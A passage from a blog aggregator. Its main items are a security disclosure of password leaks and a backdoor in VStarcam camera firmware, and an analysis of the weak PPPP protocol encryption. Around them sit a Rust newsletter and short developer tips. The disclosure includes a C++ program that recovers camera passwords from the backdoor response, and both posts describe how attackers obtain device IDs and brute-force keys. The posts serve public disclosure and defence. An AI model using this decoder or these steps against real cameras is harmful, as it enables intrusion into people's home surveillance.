                   "rspBuf = %s", );

And of course it will log the requests coming in via PPPP:

LogSystem_WriteLog("vstcp2pcmd.c", "P2pCgiParamFunction", 633, 0,
                   "sit %d, pcmd: %s", );

Reminder: these requests contain the authentication password as a parameter. So an attacker can connect to a vulnerable device, request logs, and wait for the legitimate device owner to connect. Once they do, their password will show up in the logs - voila, the attacker has access now.

VStarcam appears to be at least somewhat aware of this issue because some firmware versions contain code "censoring" password parameters prior to logging:

memcpy(pcmd, request, sizeof(pcmd));
char* pos = strstr(pcmd, "loginuse");
if (pos)
  *pos = 0;
LogSystem_WriteLog("vstcp2pcmd.c", "P2pCgiParamFunction", 633, 0,
                   "sit %d, pcmd: %s", sit, pcmd);

But that's only the beginning of the story of course.

Explicit password leaking via logs

In addition to the logging calls where the password leaks as a (possibly unintended) side-effect, some logging calls are specifically designed to write the device password to the log. For example, the function GetUserPri meant to handle authentication when dual authentication isn't enabled will often do something like this on a failed login attempt:

LogSystem_WriteLog("sysparamapp.c", "GetUserPri", 177, 0,
                   "loginuse=%s&loginpas=%s&user=admin&pwd=888888&", gUser, gPassword);

These aren't the parameters of a received login attempt but rather what the parameters should look like for the request to succeed. And if the attacker enabled log access for their connection they will get the device credentials handed on a silver platter - without even having to wait for the device owner to connect.

If dual authentication is enabled, function GetUserPri_doubleVerify often contains a similar call:

LogSystem_WriteLog("web.c", "GetUserPri_doubleVerify", 536, 0,
                   "pri[%d] system OwnerPwd[%s] app Pwd[%s]",
                   pri, gOwnerPassword, gAppPassword);

Log uploading

What got me confused at first were the firmware versions that would log the "correct" password on failed authentication attempts but lacked the capability for unauthenticated log access. When I looked closer I found the function DoSendLogToNodeServer. The firmware receives a "node configuration" from a server which includes a "push IP" and the corresponding port number. It then opens a persistent TCP connection to that address (unencrypted of course), so that DoSendLogToNodeServer can send messages to it.

Despite the name this function doesn't upload all of the application logs. There are only three to four DoSendLogToNodeServer calls in the firmware versions I looked at, and two are invariably found in function P2pCgiParamFunction, in code running on first failed authentication attempt:

sprintf(buffer,"password error [doublePwd][%s], [PassWd][%s]", gOwnerPassword, gPassword);
DoSendLogToNodeServer(request);
DoSendLogToNodeServer(buffer);

This is sending both the failed authentication request and the correct passwords to a VStarcam server. So while the password isn't being leaked here to everybody who knows how to ask, it's still being leaked to VStarcam themselves. And anybody who is eavesdropping on the device's traffic of course.

A few firmware versions have log upload functionality in a function called startUploadLogToServer, here really all logging output is being uploaded to the server. This one isn't called unconditionally however but rather enabled by the setLogUploadEnable.cgi endpoint. An endpoint which, you guessed it, can be accessed without authentication. But at least these firmware versions don't seem to have any explicit password logging, only the "regular" logging of requests.

Password-leaking backdoor

With some considerable effort, all of the above could be explained as debugging functionality which was mistakenly shipped to production. VStarcam wouldn't be the first company to fail to realize that functionality labeled "for debugging purposes only" will still be abused if released with the production build of their software. But I found yet another password leak which can only be described as a backdoor.

At some point VStarcam introduced a second version of their get_online_log.cgi API. When that second version is requested the device will respond with something like:

result=0;
index=12345678;
str=abababababab;

The result=0 part is typical and indicates that authentication (or lack thereof in this case) was successful. The other two values are unusual, and eventually I decided to check what they were about. Turned out, str is a hex-encoded version of the device password after it was XOR'ed with a random byte. And index is an obfuscated representation of that byte.

I can only explain it like this: somebody at VStarcam thought that leaking passwords via log output was too obvious, people might notice. So they decided to expose the device password in a more subtle way, one that only they knew how to decode (unless somebody notices this functionality and spends two minutes studying it in the firmware).
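Those two minutes of studying really are all it takes. The exact obfuscation of index doesn't even matter: with a single XOR byte there are only 256 possibilities, so a brute-force sketch like the following recovers the password from str alone (the hex value here is hypothetical; with a real password, few keys survive the printable filter):

#include <cctype>
#include <iostream>
#include <string>
#include <vector>

// Decode the hex-encoded `str` value into raw bytes.
std::vector<unsigned char> fromHex(const std::string& hex) {
  std::vector<unsigned char> out;
  for (size_t i = 0; i + 1 < hex.size(); i += 2)
    out.push_back((unsigned char)std::stoi(hex.substr(i, 2), nullptr, 16));
  return out;
}

int main() {
  // Hypothetical response value: "888888" XOR'ed with the byte 0x0b.
  std::string str = "333333333333";
  std::vector<unsigned char> bytes = fromHex(str);
  for (int key = 0; key < 256; ++key) {
    std::string candidate;
    bool printable = true;
    for (unsigned char b : bytes) {
      unsigned char c = b ^ (unsigned char)key;
      if (!std::isprint(c)) { printable = false; break; }
      candidate += (char)c;
    }
    if (printable)  // one of these lines will be the device password
      std::cout << "key " << key << ": " << candidate << "\n";
  }
}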

Mind you, even though this is clearly a backdoor I'm still not ruling out incompetence. Maybe VStarcam made a large enough mess with their dual authentication that their customer support needs to recover device access on a regular basis. However, they do have device reset functionality that should normally be used for this scenario.

In the end, for their customers it doesn't matter what the intention was. The result is a device that cannot be trusted with protecting access. For a security camera this is an unforgivable flaw.

Establishing a timeline

Now we are coming to the tough questions. Why do some firmware versions have this backdoor functionality while others don't? When was this introduced? In what order? What is the current state of affairs?

You might think that after compiling the data on 367 firmware versions the answers would be obvious. But the data is so inconsistent that any conclusions are really difficult. Thing is, we aren't dealing with a single evolving codebase here. We aren't even dealing with two codebases or a dozen of them. 367 firmware versions are 367 different codebases. These codebases are related, they share some code here and there, but they are all being developed independently.

I've seen this development model before. What VStarcam appears to be doing is: for every new camera model they take some existing firmware and fork it. They adjust that firmware for the new hardware, they probably add new features as well. None of this work makes it into the original firmware unless it is explicitly backported. And since VStarcam is maintaining hundreds of firmware variants, the older ones are usually only receiving maintenance changes if any at all.

To make this mess complete, VStarcam's firmware version numbers don't make any sense at all. And I don't mean the fact that VStarcam releases the same camera under 30 different model names, so there is no chance of figuring out the model to firmware version mapping. It's also the firmware version numbers themselves.

As I've already mentioned, the last part of the firmware version is the build number, increased with each release. The first part is the vendor ID: firmware versions starting with 48 are VStarcam's global releases whereas 66 is reserved for their Russian distributor (or rather was I think). Current VStarcam firmware is usually released with vendor ID 10 however, standing for… who knows, VeePai maybe? This leaves the two version parts in between, and I couldn't find any logic here whatsoever. Like, firmware versions sharing the third part of the version number would sometimes be closely related, but only sometimes. At the same time the second part of the version number is supposed to represent the camera model, but that's clearly not always correct either.

I ended up extracting all the logging calls from all the firmware versions and using that data to calculate a distance between every firmware version pair. I then fed this data into GraphViz and asked it to arrange the graph for me. It gave me the VStarcam spiral galaxy:

A graph with a number of green, yellow, orange, red and pink ovals, each containing a version number. The ovals aren’t distributed evenly but rather clustered. The color distribution also varies by cluster. Next image has more detailed descriptions of the clusters.

Click the image above to see the larger and slightly interactive version (it shows additional information when the mouse pointer is at a graph node). The green nodes are the ones that don't allow access to device logs. Yellow are the ones providing unauthenticated log access, always logging incoming requests including their password parameters. The orange ones have additional logging that exposes the correct password on failed authentication attempts - or they call DoSendLogToNodeServer function to send the correct password to a VStarcam server. The red ones have the backdoor in the get_online_log.cgi API leaking passwords. Finally pink are the ones which pretend to improve things by censoring parameters of logged requests - yet all of these without exception leak the password via the backdoor in the get_online_log.cgi API.

Note: Firmware version 10.165.19.37 isn't present in the graph because it is somehow based on an entirely different codebase with no relation to the others. It would be red in the graph however, as the backdoor has been implemented here as well.
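As an aside, the distance computation behind a layout like this can stay simple. A sketch of one workable approach - Jaccard distance over each firmware's set of extracted logging strings, emitted as a GraphViz graph - could look like the following (the file layout and version list are placeholders of mine, not the actual tooling):

#include <fstream>
#include <iostream>
#include <set>
#include <string>
#include <vector>

using StringSet = std::set<std::string>;

// Jaccard distance: 1 - |A ∩ B| / |A ∪ B|.
double jaccardDistance(const StringSet& a, const StringSet& b) {
  size_t common = 0;
  for (const std::string& s : a)
    if (b.count(s)) ++common;
  size_t unionSize = a.size() + b.size() - common;
  return unionSize == 0 ? 0.0 : 1.0 - (double)common / (double)unionSize;
}

int main() {
  // One text file of extracted logging calls per firmware version (assumed layout).
  std::vector<std::string> versions = {"48.10.1.1", "48.10.1.2"};  // placeholder list
  std::vector<StringSet> logCalls(versions.size());
  for (size_t i = 0; i < versions.size(); ++i) {
    std::ifstream in("logs/" + versions[i] + ".txt");
    std::string line;
    while (std::getline(in, line)) logCalls[i].insert(line);
  }
  // Emit an undirected GraphViz graph; neato's "len" attribute turns the
  // pairwise distances into the spatial layout.
  std::cout << "graph firmware {\n";
  for (size_t i = 0; i < versions.size(); ++i)
    for (size_t j = i + 1; j < versions.size(); ++j)
      std::cout << "  \"" << versions[i] << "\" -- \"" << versions[j]
                << "\" [len=" << jaccardDistance(logCalls[i], logCalls[j])
                << "];\n";
  std::cout << "}\n";
}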

Not only does this graph show the firmware versions as clusters, it's also possible to approximately identify the direction of time for each cluster. Let's add cluster names and time arrows to the image:

Clusters in the graph above marked with red letters A to F and blue arrows. A dense cluster of green nodes in the middle of the graph is marked as A. Left of it is cluster B with green nodes at its right edge that increasingly turn yellow towards the left edge. The blue arrow points from cluster A to the left edge of cluster B. A small cluster below clusters A and B is labeled D; here green nodes at the top turn yellow and orange towards the bottom. Cluster E below cluster D has orange nodes at the top which increasingly turn pink towards the bottom with some green nodes in between. A blue arrow points from cluster D to the bottom of cluster E. A lengthy cluster at the top of the graph is labeled C, a blue arrow points from its left to its right edge. This cluster starts out green and mostly transitions towards orange along the time arrow. Finally the right part of the graph is occupied by a large cluster labeled F. The blue arrow starts at the orange nodes in the middle of this cluster and points into two directions: towards the mostly orange nodes at the bottom and towards the top where the orange nodes are first mostly replaced by the pink ones and then by red.

Of course this isn't a perfect representation of the original data, and I wasn't sure whether it could be trusted. Are these clusters real or merely an artifact produced by the graph algorithm? I verified things manually and could confirm that the clusters are in fact distinctly different on the technical level, particularly when considering update formats:

With the firmware versions ordered like this I could finally make some conclusions about the introduction of the problematic features:

The impact

So, how bad is it? Knowing the access password allows access to the camera's main functionality: audio and video recordings. But these cameras have been known for vulnerabilities allowing execution of arbitrary commands. Also, newer cameras have an API that will start a telnet server with hardcoded and widely known administrator credentials (older cameras had this telnet server start by default). So we have to assume that a compromised camera could become part of a botnet or be used as a starting point for attacks against a network.

But this requires accessing the camera first, and most VStarcam cameras won't be exposed to the internet directly. They will only be reachable via the PPPP protocol. And for that the attackers would need to know the device ID. How would they get it?

There are a number of ways, most of which I've already discussed before. For example, anybody who was briefly connected to your network could have collected the device IDs of your cameras. The script to do that won't currently work with newer VStarcam cameras because these obfuscate the traffic on the PPPP level, but the necessary adjustments aren't exactly complicated.

PPPP networks still support "supernodes," devices that help route traffic. Back in 2019 Paul Marrapese abused that functionality to register a rogue supernode and collect device IDs en masse. There is no indication that this trick stopped working, and the VStarcam networks are likely susceptible as well.

Users also tend to leak their device IDs themselves. They will post screenshots or videos of the app's user interface. At first glance this is less problematic with the O-KAM Pro app, because this one will display only a vendor-specific device ID (it looks similar to a PPPP device ID but has seven digits and only four letters in the verification code). That is, until you notice that the app uses a public web API to translate vendor-specific device IDs into PPPP device IDs.

Anybody who can intercept some PPPP traffic can extract the device IDs from it. Even when VStarcam networks obfuscate the traffic rather than using plaintext transmission - the static keys are well known, removing the obfuscation isn't hard.

And finally, simply guessing device IDs is still possible. With only 5 million possible verification codes for each device ID and servers not implementing rate limiting, brute-force attacks are quite realistic.

Let's not forget the elephant in the room however: VStarcam themselves know all the device IDs of course. Not just that, they know which devices are active and where. With a password they can access the cameras of interest to them (or their government) anytime.

Coordinated disclosure attempt

Given the intentional nature of these issues, I was unsure how to deal with this. I mean, what's the point of reporting vulnerabilities to VStarcam that they are clearly aware of? In the end I decided to give them a chance to address the issues before they become public knowledge.

However, all I found was VStarcam boasting about their ISO 27001:2022 compliance. My understanding is that this requires them to have a dedicated person responsible for vulnerability management, but they are not obliged to list any security contact that can be reached from outside the company - and so they don't. I ended up emailing all company addresses I could find, asking whether there is any way to report security issues to them.

I haven't received any response - an experience that, from what I can tell, other people have already had with VStarcam. So I went with my initial publication schedule rather than waiting 90 days as I would normally do.

Recommendations

Whatever motives VStarcam had to backdoor their cameras, the consequence for the customers is: these cameras cannot be trusted. Their access protection should be considered compromised. Even with firmware versions shown as green on my map, there is no guarantee that I haven't missed something or that these will still be green after the next update.

If you want to keep using a VStarcam camera, the only safe way to do it is disconnecting it from the internet. It doesn't have to be disconnected physically; internet routers will often have a way to prohibit internet traffic to and from particular devices. My router for example has this feature under parental control.

Of course this will mean that you will only be able to control your camera while connected to the same network. It might be possible to explicitly configure port forwarding for the camera's RTSP port, allowing you to access at least the video stream from outside. Just make sure that your RTSP password isn't known to VStarcam.

07 Jan 2026 1:01pm GMT

This Week In Rust: This Week in Rust 633

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @thisweekinrust.bsky.social on Bluesky or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Research

Crate of the Week

This week's crate is kameo, an asynchronous actor framework with clear, trait-based abstractions for actors and typed messages.

Thanks to edgimar for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization.

If you are a feature implementer and would like your RFC to appear in this list, add a call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Let us know if you would like your feature to be tracked as a part of this list.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on Bluesky or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on Bluesky or Mastodon!

Updates from the Rust Project

341 pull requests were merged in the last week

Compiler
Library
Cargo
Clippy
Rust-Analyzer
Rust Compiler Performance Triage

Not many PRs were merged, as it was still mostly a holiday week. #149681 caused small regressions across the board; this is pending investigation.

Triage done by @kobzol. Revision range: 112a2742..7c04f5d2

Summary:

(instructions:u)             mean    range             count
Regressions ❌ (primary)      0.5%    [0.1%, 1.4%]      146
Regressions ❌ (secondary)    0.6%    [0.0%, 3.5%]      91
Improvements ✅ (primary)     -3.1%   [-4.7%, -1.5%]    2
Improvements ✅ (secondary)   -0.7%   [-6.4%, -0.1%]    15
All ❌✅ (primary)            0.4%    [-4.7%, 1.4%]     148

2 Regressions, 0 Improvements, 7 Mixed; 4 of them in rollups. 51 artifact comparisons made in total.

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • build-std: context

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

Tracking Issues & PRs

Rust

Compiler Team (MCPs only)

No items entered Final Comment Period this week for Cargo, Rust RFCs, Leadership Council, Language Team, Language Reference or Unsafe Code Guidelines.

Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.

New and Updated RFCs

Upcoming Events

Rusty Events between 2026-01-07 - 2026-02-04 🦀

Virtual
Asia
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

I find it amazing that by using Rust and Miri I am using tools that are on the edge of fundamental research in Programming Languages. Actual practically usable tools that anyone can use, not arcane code experiments passed around between academics.

- ZiCog on rust-users

Thanks to Kyllingene for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by:

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

07 Jan 2026 5:00am GMT

06 Jan 2026

feedPlanet Mozilla

Olivier Mehani: Pausing a background process

It's common, in a Unix shell, to pause a foreground process with Ctrl+Z. However, today I needed to pause a _background_ process.

tl;dr: SIGTSTP and SIGCONT

The context was a queue processor spinning too fast and preventing us from dequeuing unwanted messages.

Unsurprisingly, there are standard POSIX signals to pause and resume a target PID.

So we just need to grab the PID, and kill away.

$ kill -TSTP ${PID}
[... do what's needed ...]
$ kill -TCONT ${PID}
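If you need to do the same from a script rather than an interactive shell, a minimal Python equivalent could look like this (the process name is a made-up example):

import os
import signal
import subprocess

# Hypothetical lookup of the queue processor's PID by name.
pid = int(subprocess.check_output(["pgrep", "-f", "queue-processor"]).split()[0])

os.kill(pid, signal.SIGTSTP)  # pause, like Ctrl+Z would
# ... do what's needed ...
os.kill(pid, signal.SIGCONT)  # resume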

The post Pausing a background process first appeared on Narf.

06 Jan 2026 12:48am GMT

05 Jan 2026

feedPlanet Mozilla

Jonathan Almeida: Rebase all WIPs to the new main

A small pet peeve when fetching the latest main on jujutsu: I like to move all my WIP patches onto the new one. That's also nice because jj doesn't make me fix the conflicts immediately!

The solution from a co-worker (kudos to skippyhammond!) is to query all immediate descendants of the previous main after the fetch.

jj git fetch
# assuming 'z' is the rev-id of the previous main.
jj rebase -s "mutable()&z+" -d main

I haven't learnt how to make aliases accept params with it yet, so this will have to do for now.

Update: After a bit of searching, it seems that today this is only possible by wrapping it in a shell script. Based on the examples in the jj documentation an alias would look like this:

[aliases]
# Update all revs to the latest main; point to the previous one.
hoist = ["util", "exec", "--", "bash", "-c", """
set -euo pipefail
jj rebase -s "mutable()&$1+" -d "main"
""", ""]

05 Jan 2026 11:10pm GMT

Wladimir Palant: Analysis of PPPP “encryption”

My first article on the PPPP protocol already said everything there was to say about PPPP "encryption":

So this thing is completely broken, why look any further? There is at least one situation where you don't know the app being used, so you cannot extract the key, and you don't have any traffic to analyze either: when you are trying to scan your local network for potential hidden cameras.

This script will currently only work for cameras using plaintext communication. Other cameras expect a properly encrypted "LAN search" packet and will ignore everything else. How can this be solved without listing all possible keys in the script? By sending all possible ciphertexts of course!

TL;DR: What would be completely ridiculous with any reasonable protocol turned out to be quite possible with PPPP. There are at most 157,092 ways in which a "LAN search" packet can be encrypted. I've opened a pull request to have the PPPP device detection script adjusted.

Note: Cryptanalysis isn't my topic; I am by no means an expert here. These issues are simply too obvious.

Mapping keys to effective keys

The key which is specified as part of the app's "init string" is not being used for encryption directly. Nor is it being fed into any of the established key stretching algorithms. Instead, a key represented by the byte sequence $b_1, b_2, \ldots, b_n$ is mapped to four bytes $k_1, k_2, k_3, k_4$ that become the effective key. These bytes are calculated as follows ($\lfloor x \rfloor$ means rounding down, $\otimes$ stands for the bitwise XOR operation):

$$\begin{aligned}
k_1 &= (b_1 + b_2 + \ldots + b_n) \mod 256\\
k_2 &= (-b_1 + -b_2 + \ldots + -b_n) \mod 256\\
k_3 &= (\lfloor b_1 \div 3 \rfloor + \lfloor b_2 \div 3 \rfloor + \ldots + \lfloor b_n \div 3 \rfloor) \mod 256\\
k_4 &= b_1 \otimes b_2 \otimes \ldots \otimes b_n
\end{aligned}$$
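For concreteness, here is a minimal Python sketch of that mapping as I read the formulas above (the function name is mine, not anything from the PPPP code):

def effective_key(key: bytes) -> tuple[int, int, int, int]:
    # Map a PPPP key string to the four-byte effective key (k1, k2, k3, k4).
    k1 = sum(key) % 256                   # sum of all bytes
    k2 = -sum(key) % 256                  # negated sum, i.e. -k1 mod 256
    k3 = sum(b // 3 for b in key) % 256   # per-byte thirds, rounded down
    k4 = 0
    for b in key:
        k4 ^= b                           # XOR of all bytes
    return k1, k2, k3, k4

print(effective_key(b"example"))          # arbitrary placeholder key, not a real one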

In theory, a 4 byte long effective key means $256^4 = 4{,}294{,}967{,}296$ possible values. But that would only be the case if these bytes were independent of each other.

Redundancies within the effective key

Of course the bytes of the effective key are not independent. This is most obvious with $k_2$, which is completely determined by $k_1$:

$$\begin{aligned}
k_2 &= (-b_1 + -b_2 + \ldots + -b_n) \mod 256\\
&= -(b_1 + b_2 + \ldots + b_n) \mod 256\\
&= -k_1 \mod 256
\end{aligned}$$

This means that we can ignore $k_2$, bringing the number of possible effective keys down to $256^3 = 16{,}777{,}216$.

Now let's have a look at the relationship between $k_1$ and $k_4$. Addition and bitwise XOR are very similar operations; the latter merely ignores carry. This difference affects all the bits of the result but the lowest one, which has no incoming carry to consider. This means that the lowest bits of $k_1$ and $k_4$ are always identical. So $k_4$ has only 128 possible values for any value of $k_1$, bringing the total number of effective keys down to $256 \cdot 256 \cdot 128 = 8{,}388{,}608$.

And that's how far we can get considering only redundancies. It can be shown that a key can be constructed resulting in any combination of $k_1$ and $k_3$ values. Similarly, it can be shown that any combination of $k_1$ and $k_4$ is possible as long as the lowest bit is identical.

ASCII to the rescue

But the keys we are dealing with here aren't arbitrary bytes. They aren't limited to alphanumeric characters (some keys also contain punctuation), but they are all invariably limited to the ASCII range. And that means that the highest bit is never set in any of the $b_i$ values.

Which in turn means that the highest bit is never set in $k_4$, due to the nature of the bitwise XOR operation. We can once again rule out half of the effective keys: for any given value of $k_1$ there are only 64 possible values of $k_4$. We now have $256 \cdot 256 \cdot 64 = 4{,}194{,}304$ possible effective keys.

How large is n?

Now let's have a thorough look at how $k_3$ relates to $k_1$, ignoring the modulo operation at first. We are taking one third of each byte, rounding it down and summing that up. What if we were to sum up first and round down only at the end, how would that relate? Well, it definitely cannot be smaller than rounding down in each step, so we have an upper bound here.

$$\lfloor b_1 \div 3 \rfloor + \lfloor b_2 \div 3 \rfloor + \ldots + \lfloor b_n \div 3 \rfloor \leq \lfloor (b_1 + b_2 + \ldots + b_n) \div 3 \rfloor$$

How much smaller can the left side get? Each time we round down this removes at most two thirds, and we do this $n$ times. So altogether these rounding operations reduce the result by at most $n \cdot 2 \div 3$. This gives us a lower bound:

$$\lceil (b_1 + b_2 + \ldots + b_n - n \cdot 2) \div 3 \rceil \leq \lfloor b_1 \div 3 \rfloor + \lfloor b_2 \div 3 \rfloor + \ldots + \lfloor b_n \div 3 \rfloor$$

If $n$ is arbitrary these bounds don't help us at all. But $n$ isn't arbitrary: the keys used for PPPP encryption tend to be fairly short. Let's say that we are dealing with keys of length 16 at most, which is a safe bet. If we know the sum of the bytes, these bounds allow us to narrow down $k_3$ to $\lceil 16 \cdot 2 \div 3 \rceil = 11$ possible values.

But we don't know the sum of bytes. What we have is $k_1$, which is that sum modulo 256; the sum is actually $i \cdot 256 + k_1$ where $i$ is some nonnegative integer. How large can $i$ get? Remembering that we are dealing with ASCII keys, each byte has at most the value 127. And we have at most 16 bytes. So the sum of bytes cannot be higher than $127 \cdot 16 = 2032$ (or 7F0 in hexadecimal). Consequently, $i$ is 7 at most.

Let's write down the bounds for $k_3$ now:

$$\lceil (i \cdot 256 + k_1 - n \cdot 2) \div 3 \rceil \leq j \cdot 256 + k_3 \leq \lfloor (i \cdot 256 + k_1) \div 3 \rfloor$$

We have to consider this for eight possible values of $i$. Wait, do we really?

Once we move into modulo 256 space again, the $i \cdot 256 \div 3$ part of our bounds (which is the only part dependent on $i$) will assume the same value after every three $i$ values. So only three values of $i$ are really relevant, say 0, 1 and 2. Meaning that for each value of $k_1$ we have $3 \cdot 11 = 33$ possible values for $k_3$.

This gives us $256 \cdot 33 \cdot 64 = 540{,}672$ as the number of possible effective keys. My experiments with random keys indicate that this should be pretty much as far down as it goes. There may still be more edge conditions rendering some effective keys impossible, but if these exist their impact is insignificant.
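As a sanity check, this key space can be enumerated directly from the bounds above. A minimal Python sketch, assuming the same maximum key length of 16 (all names are mine):

def candidate_k3(k1: int, max_len: int = 16) -> set[int]:
    # All k3 values compatible with a given k1, per the bounds above.
    out = set()
    for i in range(3):  # only three wrap-around counts matter modulo 256
        s = i * 256 + k1
        lo = -(-(s - 2 * max_len) // 3)  # ceiling division
        hi = s // 3                      # floor division
        out.update(v % 256 for v in range(lo, hi + 1))
    return out

def candidate_k4(k1: int) -> list[int]:
    # k4 has its high bit clear (ASCII keys) and shares its lowest bit with k1.
    return [v for v in range(128) if (v ^ k1) & 1 == 0]

total = sum(len(candidate_k3(k1)) * len(candidate_k4(k1)) for k1 in range(256))
print(total)  # prints 540672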

Not all effective keys are equally likely, however: the $k_3$ values at the outer edges of the possible range are very unlikely. So one could prioritize the keys by probability - if the total number weren't already low enough to render this exercise moot.

How many ciphertexts is that?

We have the four-byte plaintext F1 30 00 00 and we have 540,672 possible effective keys. How many ciphertexts does this translate to? With any reasonable encryption scheme the answer would be: slightly less than 540,672, due to a few unlikely collisions which could occur here.

But PPPP doesn't use a reasonable encryption scheme. With merely four bytes of plaintext there is a significant chance that PPPP will only use part of the effective key for encryption, resulting in identical ciphertexts for every key sharing that part. I didn't bother analyzing this possibility mathematically; my script simply generated all possible ciphertexts. So the exact answer is: 540,672 effective keys produce 157,092 ciphertexts.

And that's why you should leave cryptography to experts.

Understanding the response

Now let's say we send 157,092 encrypted requests. An encrypted response comes back. How do we decrypt it without knowing which of the requests was accepted?

All PPPP packets start with the magic byte F1, so the first byte of our response's plaintext must be F1 as well. The "encryption" scheme used by PPPP allows translating that knowledge directly into the value of $k_1$. Now one could probably (definitely) guess more plaintext parts and with some clever tricks deduce the rest of the effective key. But there are only $33 \cdot 64 = 2{,}112$ possible effective keys for each value of $k_1$ anyway. It's much easier to simply try out all 2,112 possibilities and see which one results in a response that makes sense.
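In code, that brute-force loop might look roughly like the following sketch. It reuses candidate_k3() and candidate_k4() from the earlier sketch; derive_k1(), pppp_decrypt() and looks_valid() are hypothetical placeholders for the k1 recovery, the actual cipher and the plausibility check, none of which are spelled out here:

def recover_plaintexts(response: bytes) -> list[bytes]:
    # The first plaintext byte is known to be 0xF1, which determines k1;
    # derive_k1() stands in for that cipher-specific step.
    k1 = derive_k1(response[0])
    results = []
    for k3 in candidate_k3(k1):            # 33 candidates
        for k4 in candidate_k4(k1):        # 64 candidates
            key = (k1, -k1 % 256, k3, k4)  # k2 is determined by k1
            plain = pppp_decrypt(response, key)
            if plain[0] == 0xF1 and looks_valid(plain):
                results.append(plain)      # occasionally more than one match
    return results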

The response here is 24 bytes large, making ambiguous decryptions less likely. Still, my experiments show that in approximately 4% of the cases closely related keys will produce valid but different decryption results. So you will get two or more similar device IDs and any one of them could be correct. I don't think that this ambiguity can be resolved without further communication with the device, but at least with my changes the script reliably detects when a PPPP device is present on the network.

05 Jan 2026 3:50pm GMT

The Rust Programming Language Blog: Project goals update — December 2025

The Rust project is currently working towards a slate of 41 project goals, with 13 of them designated as Flagship Goals. This post provides selected updates on our progress towards these goals (or, in some cases, lack thereof). The full details for any particular goal are available in its associated tracking issue on the rust-project-goals repository.

Flagship goals

"Beyond the `&`"

Continue Experimentation with Pin Ergonomics (rust-lang/rust-project-goals#389)
Progress
Point of contact

Frank King

Champions

compiler (Oliver Scherer), lang (TC)

Task owners

Frank King

1 detailed update available.

Comment by @frank-king posted on 2025-12-18:
Design a language feature to solve Field Projections (rust-lang/rust-project-goals#390)
Progress
Point of contact

Benno Lossin

Champions

lang (Tyler Mandry)

Task owners

Benno Lossin

5 detailed updates available.

Comment by @BennoLossin posted on 2025-12-07:

Since we have chosen virtual places as the new approach, we reviewed what open questions are most pressing for the design. Our discussion resulted in the following five questions:

  1. Should we have 1-level projections xor multi-level projections?
  2. What is the semantic meaning of the borrow checker rules (BorrowKind)?
  3. How should we add "canonical projections" for types such that we have nice and short syntax (like x~y or x.@y)?
  4. What to do about non-indirected containers (Cell, MaybeUninit, Mutex, etc)?
  5. How does one inspect/query Projection types?

We will focus on these questions in December as well as implementing FRTs.

Comment by @BennoLossin posted on 2025-12-12:

Canonical Projections

We have discussed canonical projections and come up with the following solution:

pub trait CanonicalReborrow: HasPlace {
    type Output<'a, P: Projection<Source = Self::Target>>: HasPlace<Target = P::Target>
    where
        Self: PlaceBorrow<'a, P, Self::Output<'a, P>>;
}

Implementing this trait permits using the syntax @$place_expr where the place's origin is of the type Self (for example @x.y where x: Self and y is an identifier or tuple index, or @x.y.z etc). It is desugared to be:

@<<Self as CanonicalReborrow>::Output<'_, projection_from_place_expr!($place_expr)>> $place_expr

(The names of the trait, associated type and syntax are not final, better suggestions welcome.)

Reasoning

  • We need the Output associated type to support the @x.y syntax for Arc and ArcRef.
  • We put the FRT and lifetime parameter on Output in order to force implementers to always provide a canonical reborrow, so if @x.a works, then @x.b also works (when b also is a field of the struct contained by x).
    • This (sadly or luckily) also has the effect that making @x.a and @x.b return different wrapper types is more difficult to implement and requires a fair bit of trait dancing. We should think about discouraging this in the documentation.
Comment by @BennoLossin posted on 2025-12-16:

Non-Indirected Containers

Types like MaybeUninit<T>, Cell<T>, ManuallyDrop<T>, RefCell<T> etc. currently do not fit into our virtual places model, since they don't have an indirection. They contain the place directly inline (and some are even repr(transparent)). For this reason, we currently don't have projections available for &mut MaybeUninit<T>.

Enter our new trait PlaceWrapper which these types implement in order to make projections available for them. We call these types place wrappers. Here is the definition of the trait:

pub unsafe trait PlaceWrapper<P: Projection<Source = Self::Target>>: HasPlace {
    type WrappedProjection: Projection<Source = Self>;

    fn wrap_projection(p: P) -> Self::WrappedProjection;
}

This trait should only be implemented when Self doesn't contain the place as an indirection (so for example Box must not implement the trait). When this trait is implemented, then Self has "virtual fields" available (actually all kinds of place projections). The name of these virtual fields/projections is the same as the ones of the contained place. But their output type is controlled by this trait.

As an example, here is the implementation for MaybeUninit:

impl<T, P: Projection<Source = T>> PlaceWrapper<P> for MaybeUninit<T> {
    type WrappedProjection = TransparentProjection<P, MaybeUninit<T>, MaybeUninit<P::Target>>;

    fn wrap_projection(p: P) -> Self::WrappedProjection {
        TransparentProjection(p, PhantomData, PhantomData)
    }
}

Where TransparentProjection will be available in the standard library defined as:

pub struct TransparentProjection<P, Src, Tgt>(P, PhantomData<Src>, PhantomData<Tgt>);

impl<P: Projection, Src, Tgt> Projection for TransparentProjection<P, Src, Tgt> {
    type Source = Src;
    type Target = Tgt;

    fn offset(&self) -> usize {
